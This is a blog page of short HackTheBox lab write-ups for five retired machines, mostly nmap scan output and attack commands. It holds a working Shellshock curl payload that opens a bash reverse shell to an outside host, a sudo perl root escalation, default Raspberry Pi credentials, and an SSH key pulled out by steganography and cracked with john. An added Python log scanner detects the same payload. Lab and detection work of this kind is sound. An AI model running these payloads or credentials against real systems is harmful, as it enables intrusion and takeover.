Showing posts with label Hackthebox. Show all posts

Monday, 3 September 2018

Shocker 10.10.10.56 Shellshock Bash Exploit

Commands:


  1. nmap -A 10.10.10.56
  2. nc -lnvp 1234
  3. curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.11/1234 0>&1' http://10.10.10.56/cgi-bin/user.sh
  4. sudo perl -e 'exec "/bin/sh";'
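On the defender's side, an added example (not from the original post): the curl command above delivers the Shellshock trigger in the User-Agent header, so the most useful log check is for the bash function-definition marker in the header fields of a combined-format web access log. The log lines below are constructed samples; line 1 replays the header from step 3.

```python
import re
from dataclasses import dataclass
from typing import List

# Shellshock (CVE-2014-6271) fires when bash imports an environment variable whose
# value starts with a function definition "() {". CGI servers export request headers
# such as User-Agent and Referer as environment variables, which is how the header
# in the curl command above reaches bash via /cgi-bin/user.sh.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Apache/nginx "combined" access-log format: the two trailing quoted fields are the
# Referer and User-Agent headers, both fully attacker-controlled.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

@dataclass
class Hit:
    line_no: int
    src_ip: str
    header: str        # which header carried the function definition
    cgi_target: bool   # request path under /cgi-bin/ makes the probe far more dangerous
    value: str

def is_shellshock_probe(header_value: str) -> bool:
    """True if a header value carries the bash function-definition marker."""
    return SHELLSHOCK_RE.search(header_value) is not None

def scan_access_log(text: str) -> List[Hit]:
    """Return one Hit per log line whose Referer or User-Agent looks like Shellshock."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = COMBINED_RE.match(line)
        if not m:
            continue  # unparsable line: skip rather than mis-attribute fields
        cgi = "/cgi-bin/" in m.group("req")
        for field, name in (("referer", "Referer"), ("ua", "User-Agent")):
            if is_shellshock_probe(m.group(field)):
                hits.append(Hit(n, m.group("ip"), name, cgi, m.group(field)))
    return hits

# Constructed sample log lines (not from the original page). Line 1 replays the
# User-Agent from the curl command above; line 3 carries the marker in Referer.
SAMPLE_LOG = """\
10.10.14.11 - - [03/Sep/2018:10:00:01 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :; }; /bin/bash -i >& /dev/tcp/10.10.14.11/1234 0>&1"
10.10.14.12 - - [03/Sep/2018:10:00:05 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.10.14.13 - - [03/Sep/2018:10:00:09 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "() { :;}; echo vulnerable" "curl/7.61.0"
"""
```

Run `scan_access_log(SAMPLE_LOG)` to get the two hits; patching bash (or removing the CGI handler) is the fix, the log check only tells you who tried.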

Saturday, 25 August 2018

Mirai 10.10.10.48 Raspberry Pi HackTheBox

User: pi
Password: raspberry

root@kali:~# ssh pi@10.10.10.48
pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User pi may run the following commands on localhost:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL

Grandpa 10.10.10.14 Microsoft IIS WebDav ScStoragePathFromUrl Overflow

root@kali:~/Desktop/HTB_VIP# nmap -script=vuln 10.10.10.14

Starting Nmap 7.60 ( https://nmap.org ) at 2018-08-26 00:19 PKT
Nmap scan report for 10.10.10.14
Host is up (0.13s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE
80/tcp open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /postinfo.html: Frontpage file or folder
|   /_vti_bin/_vti_aut/author.dll: Frontpage file or folder
|   /_vti_bin/_vti_aut/author.exe: Frontpage file or folder
|   /_vti_bin/_vti_adm/admin.dll: Frontpage file or folder
|   /_vti_bin/_vti_adm/admin.exe: Frontpage file or folder
|   /_vti_bin/fpcount.exe?Page=default.asp|Image=3: Frontpage file or folder
|   /_vti_bin/shtml.dll: Frontpage file or folder
|_  /_vti_bin/shtml.exe: Frontpage file or folder
| http-frontpage-login:
|   VULNERABLE:
|   Frontpage extension anonymous login
|     State: VULNERABLE
|       Default installations of older versions of frontpage extensions allow anonymous logins which can lead to server compromise.
|     
|     References:
|_      http://insecure.org/sploits/Microsoft.frontpage.insecurities.html
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

Nmap done: 1 IP address (1 host up) scanned in 430.76 seconds
root@kali:~/Desktop/HTB_VIP#

root@kali:~/Desktop/HTB_VIP# nmap -A 10.10.10.14

Starting Nmap 7.60 ( https://nmap.org ) at 2018-08-26 00:14 PKT
Nmap scan report for 10.10.10.14
Host is up (0.13s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods:
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Server Type: Microsoft-IIS/6.0
|   WebDAV type: Unkown
|   Server Date: Sat, 25 Aug 2018 19:15:18 GMT
|_  Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_2000::sp4
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (91%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows Server 2008 Enterprise SP2 (91%), Microsoft Windows 2003 SP2 (90%), Microsoft Windows XP SP3 (89%), Microsoft Windows 2000 SP4 (86%), Microsoft Windows XP (86%), Microsoft Windows Server 2003 SP1 - SP2 (85%), Microsoft Windows XP SP2 or Windows Server 2003 SP2 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Tenten 10.10.10.10 CV filename disclosure on Job-Manager WP plugin

Commands:
$ wget http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
$ steghide extract -sf HackerAccessGranted.jpg
Enter passphrase:
wrote extracted data to "id_rsa".
$ python sshng2john.py id_rsa > id_rsa.encrypted
$ john id_rsa.encrypted --wordlist=/usr/share/wordlists/rockyou.txt
$ ssh -i id_rsa takis@10.10.10.10
takis@tenten:~$ sudo -l
sudo /bin/fuckin su

root@kali:~/Desktop/HTB_VIP# nmap -script=vuln 10.10.10.10

Starting Nmap 7.60 ( https://nmap.org ) at 2018-08-25 22:52 PKT
Nmap scan report for 10.10.10.10
Host is up (0.13s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.10
|   Found the following possible CSRF vulnerabilities:
|   
|     Path: http://10.10.10.10:80/
|     Form id: search-form-5b81979606f84
|     Form action: http://10.10.10.10/
|   
|     Path: http://10.10.10.10/#icon-bars
|     Form id: search-form-5b81979606f84
|     Form action: http://10.10.10.10/
|   
|     Path: http://10.10.10.10/
|     Form id: search-form-5b81979606f84
|     Form action: http://10.10.10.10/
|   
|     Path: http://10.10.10.10/#icon-close
|     Form id: search-form-5b81979606f84
|     Form action: http://10.10.10.10/
|   
|     Path: http://10.10.10.10/index.php/category/uncategorized/
|     Form id: search-form-5b8197994e6e2
|     Form action: http://10.10.10.10/
|   
|     Path: http://10.10.10.10/#icon-search
|     Form id: search-form-5b81979606f84
|     Form action: http://10.10.10.10/
|   
|     Path: http://10.10.10.10/wp-login.php
|     Form id: loginform
|     Form action: http://10.10.10.10/wp-login.php
|   
|     Path: http://10.10.10.10/index.php/jobs/
|     Form id:
|     Form action: http://10.10.10.10/index.php/jobs/apply/
|   
|     Path: http://10.10.10.10/#content
|     Form id: search-form-5b81979606f84
|     Form action: http://10.10.10.10/
|   
|     Path: http://10.10.10.10/index.php/2017/04/
|     Form id: search-form-5b81979f27fb2
|_    Form action: http://10.10.10.10/
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /wp-login.php: Possible admin folder
|   /wp-login.php: Wordpress login page.
|_  /readme.html: WordPress version 4.7
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-wordpress-users:
| Username found: takis
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'

Nmap done: 1 IP address (1 host up) scanned in 360.64 seconds
root@kali:~/Desktop/HTB_VIP#

wpscan -u 10.10.10.10 -f -e -r

Legacy 10.10.10.4 MS08-067 Microsoft Server Service Relative Path Stack Corruption

root@kali:~/Desktop/HTB_VIP/Legacy# nmap -script=vuln 10.10.10.4

Starting Nmap 7.60 ( https://nmap.org ) at 2018-08-25 22:37 PKT
Nmap scan report for 10.10.10.4
Host is up (0.13s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
3389/tcp closed ms-wbt-server

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|         
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|         
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap done: 1 IP address (1 host up) scanned in 49.79 seconds
root@kali:~/Desktop/HTB_VIP/Legacy#